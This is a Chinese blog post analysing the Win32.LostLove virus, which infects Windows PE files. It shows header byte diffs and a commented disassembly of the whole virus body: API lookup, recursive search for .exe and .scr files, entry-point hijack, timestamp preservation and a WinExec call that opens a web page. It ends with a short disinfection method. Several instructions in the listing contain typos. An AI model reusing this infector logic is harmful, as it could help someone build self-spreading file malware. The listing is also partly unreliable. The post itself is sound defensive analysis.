Win32.LostLove 病毒分析及清除方法

以前曾经分析过一个小病毒,贴出来共享:

1、LostLove病毒,该病毒的特征是感染扩展名为
EXE和SCR的Windows的PE文件,文件长度增加1186字节。
病毒发作时会查找C—Z盘所有符合条件的文件,并将其感
染,同时会打开 http://www.wx-packs.com/lx/boy/boyhacker.htm
页面,不会造成其他的破坏。
2、感染数据
以被感染的 C:/WINDOWS/CALC.EXE 为例,正常为94,208字节,
感染后为95,394字节。

感染前:
      00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F   0123456789ABCDEF
0000  4D 5A 90 00 03 00 00 00-04 00 00 00 FF FF 00 00   MZ..............
0010  B8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00   ........@.......
0020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0030  00 00 00 00 00 00 00 00-00 00 00 00 C8 00 00 00   ................

00C0                          50 45 00 00 4C 01 03 00           PE..L...
00D0  B4 AF FD 34 00 00 00 00-00 00 00 00 E0 00 0F 03   ...4............
00E0  0B 01 05 0C 00 1C 01 00-00 38 00 00 00 00 00 00   .........8......
00F0  E0 19 01 00 00 10 00 00-00 30 01 00 00 00 00 01   .........0......
0100  00 10 00 00 00 10 00 00-05 00 00 00 05 00 00 00   ................
0110  04 00 00 00 00 00 00 00-00 70 01 00 00 06 00 00   .........p......
0120  90 B7 01 00 02 00 00 00-00 00 04 00 00 10 00 00   ................
0130  00 00 10 00 00 10 00 00-00 00 00 00 10 00 00 00   ................
0140  00 00 00 00 00 00 00 00-20 20 01 00 8C 00 00 00   ........  ......
0150  00 40 01 00 18 26 00 00-00 00 00 00 00 00 00 00   .@...&..........
0160  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0170  F0 11 00 00 1C 00 00 00-00 00 00 00 00 00 00 00   ................
0180  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0190  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
01A0  00 10 00 00 E8 01 00 00-00 00 00 00 00 00 00 00   ................
01B0  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
01C0  2E 74 65 78 74 00 00 00-0E 1A 01 00 00 10 00 00   .text...........
01D0  00 20 01 00 00 10 00 00-00 00 00 00 00 00 00 00   . ..............
01E0  00 00 00 00 20 00 00 60-2E 64 61 74 61 00 00 00   .... ..`.data...
01F0  84 0F 00 00 00 30 01 00-00 10 00 00 00 30 01 00   .....0.......0..
0200  00 00 00 00 00 00 00 00-00 00 00 00 40 00 00 C0   ............@...
0210  2E 72 73 72 63 00 00 00-18 26 00 00 00 40 01 00   .rsrc....&...@..
0220  00 30 00 00 00 40 01 00-00 00 00 00 00 00 00 00   .0...@..........
0230  00 00 00 00 40 00 00 40-00 00 00 00 00 00 00 00   ....@..@........
0240  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................
0250  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00   ................

感染后:
      00 01 02 03 04 05 06 07-08 09 0A 0B 0C 0D 0E 0F   0123456789ABCDEF

00F0  00 70 01 00                                       .p..           

0110                          00 80 01 00                       ....

0120  A2 04 00 00                                       ....

0210                          A2 34 00 00                       .4..

0220  A2 34 00 00                                       .4..

0230              40 00 00 E0                               @...



比较一下:
地址  感染前 感染后
00F0:   E0     00
00F1:   19     70

0119:   70     80

0120:   90     A2
0121:   B7     04
0122:   01     00

0218:   18     A2
0219:   26     34

0220:   00     A2
0221:   30     34

0237:   40     E0

其中00F0-00F3为程序入口地址,感染前为000119E0,感染后为00017000
0118-011B为所有section大小,增加了1000
0120-0123为检验和,改为4A2
0218-021B为最后一个section的VirtualSize,增加了E8A
0220-0223为最后一个section的长度,增加了4A2
0234-0237为最后一个section的属性,该为读、写、执行3种权限
可见,病毒在最后一个section的后面,然后修改了入口地址和相应的section大小等,
最重要的是恢复程序入口地址。
3、病毒代码
将最后1186字节读出,进行反汇编,得如下代码:

;************** 原程序入口 ***********************
010119E0        PUSH    BP
                ....

;************** 病毒入口 *************************

01017000        PUSHAD
                CALL    01017010
                MOV     ESP,FS:[0000]
                JMP     [ESP+28]

01017010        PUSH    WORD PTR FS:[0000]
                MOV     FS:[0000],ESP
                MOV     EAX,DWORD PTR [ESP+28]
                AND     AX,F000
                MOV     ESI,EAX
01017026        SUB     ESI,00001000
                CMP     WORD PTR [ESI],5A4D              ;查找 '4D5A' 即应用程序标志
                JNE     01017026
                MOVZX   EDI,WORD PTR [ESI+3C]
                ADD     EDI,ESI
                CMP     WORD PTR [EDI],4550              ;查找 '4550' 即PE程序标志
                JNE     01017026
                MOV     EBP,DWORD PTR [EDI+78]
                ADD     EBP,ESI
                MOV     EBX,DWORD PTR [EBP+20]
                ADD     EBX,ESI
                XOR     AX,AX
                MOV     EDX,ESI

0101704E        ADD     EBX,00000004
                INC     EAX
                MOV     EDI,DWORD PTR [EBX]
                ADD     EDI,EDX
01017056        CALL    0101706A
0101705B        DB      'GetProcAddress',0
0101706A        POP     ESI
                XOR     ECX,ECX
                MOV     CL,0F
                CLD
                REPZ    CMPSB                            ;查找GetProcAddress的入口地址
                JNE     0101704E
                MOV     ESI,EDX
                MOV     EBX,DWORD PTR [EBP+24]
                ADD     EBX,ESI
                MOVZX   ECX, WORD PTR [EBX+2*EAX]
                MOV     EBX,DWORD PTR [EBP+1C]
                ADD     EBX,ESI
                MOV     EBX,DWORD PTR [EBX+4*ECX]
                ADD     EBX,ESI
                SUB     ESP,00000060
                MOV     EDI,ESP
                CALL    0101709F
01017093        DB      'ExitProcess',0
0101709F        CALL    010170BB
010170A4        DB      'RegisterServiceProcess',0
010170BB        CALL    010170C6
010170C0        DB      'Sleep',0
010170C6        CALL    010170D3
010170CB        DB      '_lclose',0
010170D3        CALL    010170E0
010170D8        DB      '_llseek',0
010170E0        CALL    010170ED
010170E5        DB      '_lwrite',0
010170ED        CALL    010170F9
010170F2        DB      '_lread',0
010170F9        CALL    01017105
010170FE        DB      '_lopen',0
01017105        CALL    01017116
0101710A        DB      'SetFileTime',0
01017116        CALL    0101712E
0101711B        DB      'SetFileAttributesA',0
0101712E        CALL    0101713D
01017133        DB      'FindClose',0
0101713D        CALL    01017150
01017142        DB      'FindNextFileA',0
01017150        CALL    01017164
01017155        DB      'FindFirstFileA',0
01017164        CALL    0101717E
01017169        DB      'SetCurrentDirectoryA',0
0101717E        CALL    01017191
01017183        DB      'GetDriveTypeA',0
01017191        CALL    0101719E
01017196        DB      'WinExec',0
0101719E        CALL    010171B3
010171A3        DB      'GetCommandLineA',0
010171B3        CALL    010171C5
010171B8        DB      'GetLastError',0
010171C5        CALL    010171D7
010171CA        DB      'CreateMutexA',0
010171D7        CALL    010171E9
010171DC        DB      'LoadLibraryA',0

010171E9        MOV     ECX,00000014
010171EE        MOV     EBP,ECX
                PUSH    ESI
                CALL    EBX           ;调用GetProcAddress
                CLD
                STOSD
                MOV     ECX,EBP
                LOOP    010171EE      ;查找所需要使用的函数入口
                MOV     ESI,ESP       ;函数就是上面的20个
                CALL    01017209

01017200        DB      'LostLove',0  ;病毒标志

01017209        PUSH    0
                PUSH    0
                CALL    [ESI+4]       ;CreateMutexA
                CALL    [ESI+8]       ;GetLastError
                OR      EAX,EAX
01017215        JE      0101722B      ;成功,说明病毒未驻留,转病毒程序
01017217        MOV     ESP,FS:[0000]
                POP     WORD PTR FS:[0000]
                POP     EAX
                POPAD
01017225        PUSH    010119E0
0101722A        RET                   ;返回原程序

;---------------------------------------

0101722B        CALL    [ESI+0C]      ;GetCommandLineA
                PUSH    00000001
                PUSH    EAX
                CALL    [ESI+10]      ;WinExec 'Command Line'
                MOV     EAX,DWORD PTR [ESI+48]
                OR      EAX,EAX
                JE      01017241

0101723B        PUSH    00000001
                PUSH    00000000
                CALL    EAX            ;RegisterServiceProcess
01017241        CALL    01017289

01017246        PUSH    00000001
                CALL    01017283

0101724D        DB      'Explorer http://www.wx-packs.com/lx/boy/boyhacker.htm',0

01017283        CALL    [ESI+10]       ;WinExec
                CALL    [ESI+4C]       ;ExitProcess

01017289        MOV     ECX,00000018
                MOV     EDX,005C3A43   ;'C:/'
01017293        PUSH    ECX
                PUSH    EDX
                PUSH    ESP
                CALL    [ESI+14]       ;GetDriveTypeA
                CMP     EAX,2
                JB      010172A9       ;只找固定磁盘
                CMP     EAX,5          ;光盘软盘不感兴趣
010172A1        JE      010172A9
                PUSH    ESP
                CALL    010172AF

010172A9        POP     EDX
                INC     EDX
                POP     ECX
                LOOP    01017293
                RET

010172AF        ENTER   0000,00
                PUSH    EBX
                PUSH    ESI
                PUSH    EDI
                PUSH    [EBP+08]
                CALL    [ESI+18]      ;SetCurrentDirectoryA
                OR      EAX,EAX
                JE      0101731B      ;出错
                SUB     ESP,00001000
                MOV     DWORD PTR [ESP],002A2E2A        ;'*.*'
                MOV     EAX,ESP
                PUSH    ESP
                PUSH    EAX
                CALL    [ESI+1C]      ;FindFirstFileA
                MOV     EBX,EAX
                CMP     EAX,FFFFFFFF
                JE      0101730A
                PUSH    ESP
                PUSH    EBX
                CALL    [ESI+20]      ;FindNextFileA
                OR      EAX,EAX
                JE      01017306
                LEA     DX,DWORD PTR [ESP+2C]
                MOV     EAX,DWORD PTR [ESP]
                AND     EAX,00000010
                JE      010172FE
                MOV     EAX,DWORD PTR[EDX]
                CMP     AL,2E
                JE      010172DB
                PUSH    EDX
                CALL    010172AF
                JMP     010172DB

010172FE        PUSH    ESP
                CALL    01017322
                JMP     010172DB

01017306        PUSH    EBX
                CALL    [ESI+24]      ;FindClose
0101730A        MOV     DWORD PTR [ESP],00002E2E
                PUSH    ESP
                CALL    [ESI+18]      ;SetCurrentDirectoryA
                ADD     ESP,00001000

0101731B        POP     EDI
                POP     ESI
                POP     EBX
                LEAVE
                RET     0004

01017322        ENTER   0000,00
                PUSH    EBX
                PUSH    ESI
                PUSH    EDI
                MOV     EBX,DWORD PTR [EBP+8]
                MOV     ECX,00001000
                LEA     EDI,DWORD PTR [EBX+2C]
                XOR     AL,AL
                CLD
                REPNZ   SCASB         ;得到扩展名
                MOV     EAX,DWORD PTR [EDI-05]
                OR      EAX,20202000
                CMP     EAX,6578652E  ;'.exe'
                JE      01017356
                CMP     EAX,7263732E  ;'.scr'
                JE      01017356
                POP     EDI
                POP     ESI
                POP     EBX
                LEAVE
                RET     0004

01017356        PUSH    EBX
                CALL    01017363
                POP     EDI
                POP     ESI
                POP     EBX
                LEAVE
                RET     0004

;**************** 感染过程在这儿 *******************************
01017363        ENTER   0000,00
                PUSH    EBX
                PUSH    ESI
                PUSH    EDI
                MOV     EDI,DWORD PTR [EBP+08]
                LEA     EBX,DWORD PTR [EDI+2C]
                PUSH    00000000
                PUSH    EBX
                CALL    [ESI+28]     ;SetFileAttributesA
                PUSH    00000002     ;读写方式
                PUSH    EBX
                CALL    [ESI+30]     ;_lopen   打开文件
                CMP     EAX,FFFFFFFF
                JE      0101739D     ;出错
                MOV     EBX,EAX
                PUSH    EBX
                CALL    010173AD
                LEA     EAX,DWORD PTR [EDI+04]
                LEA     ECX,DWORD PTR [EDI+0C]
                LEA     EDX,DWORD PTR [EDI+14]
                PUSH    EDX
                PUSH    ECX
                PUSH    EAX
                PUSH    EBX
                CALL    [ESI+2C]     ;SetFileTime 怪不得文件日期没有变化
                PUSH    EBX
                CALL    [ESI+40]     ;_lclose

0101739D        LEA     BX,DWORD PTR [EDI+2C]
                PUSH    DWORD PTR [EDI]
                PUSH    EBX
                CALL    [ESI+28]    ;SetFileAttributesA
                POP     EDI
                POP     ESI
                POP     EBX
                LEAVE
                RET     0004

010173AD        ENTER   0000,00
                PUSH    EBX
                PUSH    ESI
                PUSH    EDI
                SUB     ESP,00001000
                MOV     EDI,ESP
                PUSH    00001000        ;读4096字节
                PUSH    EDI             ;地址
                PUSH    [EBP+08]        ;文件号
                CALL    [ESI+34]        ;_hread
                MOVZX   EAX,WORD PTR [EDI+3C]
                ADD     EDI,EAX
                CMP     EDI,EDP
                JA      01017495
                CMP     WORD PTR [EDI],4550  ;是否真的是PE文件?
                JNE     01017495
                MOV     EAX,000004A2
                XCNH    DWORD PTR [EDI+58],EAX
                CMP     EAX,000004A2         ;校验和是否为4A2,见下文说明
                JE      01017495
                LEA     EBX,DWORD PTR [EDI+000000F8] ;第一个section header的地址
                MOVZX   ECX,WORD PTR [EDI+6] ;section的数目
                DEC     ECX
010173FF        ADD     EBX,00000028
                LOOP    010173FF             ;找到最后一个section header
                CMP     EBX,EBP
                JA      01017495
                OR      DWORD PTR [EBX+24],E0000000 ;修改其属性

                PUSH    00000002          ;从末尾
                PUSH    00000000          ;
                PUSH    [EBP+8]
                CALL    [ESI+3C]          ;_llseek
                CMP     EAX,FFFFFFFF
                JE      01017495
                PUSH    EAX
                ADD     EAX,000004A2
                SUB     EAX,DWORD PTR [EBX+14]
                MOV     DWORD PTR [EBX+10],EAX   ;最后一个section的大小
                MOV     EDX,DWORD PTR [EBX+8]
                CMP     EAX,EDX
                JB      0101744B
                MOV     DWORD PTR [EBX+8],EAX
                MOV     ECX,DWORD PTR [EDI+38]
                DEC     CX
                ADD     EAX,ECX
                ADD     EDX,ECX
                NOT     ECX
                AND     EAX,ECX
                AND     EDX,ECX
                SUB     EAX,EDX
                ADD     DWORD PTR [EDI+50],EAX   ;SizeOfImage

0101744B        POP     ECX
                SUB     ECX,DWORD PTR [EBX+14]   ;PointerToRawData
                ADD     ECX,DWORD PTR [EBX+0C]   ;VirtualAddress
                XCHG    DWORD PTR [EDI+28],ECX   ;  !!!!!修改入口地址!!!!!
                ADD     ECX,DWORD PTR [EDI+34]   ; 原入口地址加ImageBase放入ECX
                CALL    0101745D

0101745D        POP     EDI
                SUB     EDI,00000237
                MOV     DWORD PTR [EDI],ECX      ;把ECX放到这儿了
                SUB     EDI,00000226
                PUSH    000004A2
                PUSH    EDI
                PUAH    [EBP+08]
                CALL    [ESI+38]                 ;_hwrite
                CMP     EAX,FFFFFFFF
                JE      01017495
                PUSH    00000000                 ;到文件头
                PUSH    00000000
                PUSH    [EBP+08]
                CALL    [ESI+3C]                 ;_llseek
                MOV     EAX,ESP
                PUSH    00001000
                PUSH    EAX
                PUSH    [EBP+08]
                CALL    [ESI+38]                 ;_hwrite

01017495        ADD     ESP,00001000
                POP     EDI
                POP     ESI
                POP     EBX
                LEAVE
                RET     0004
4、清除方法:
从上面程序就可以得到清除的方法,从文件最后倒数027C-0279字节得到的数减去ImageBase
就是原来的入口地址。

  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值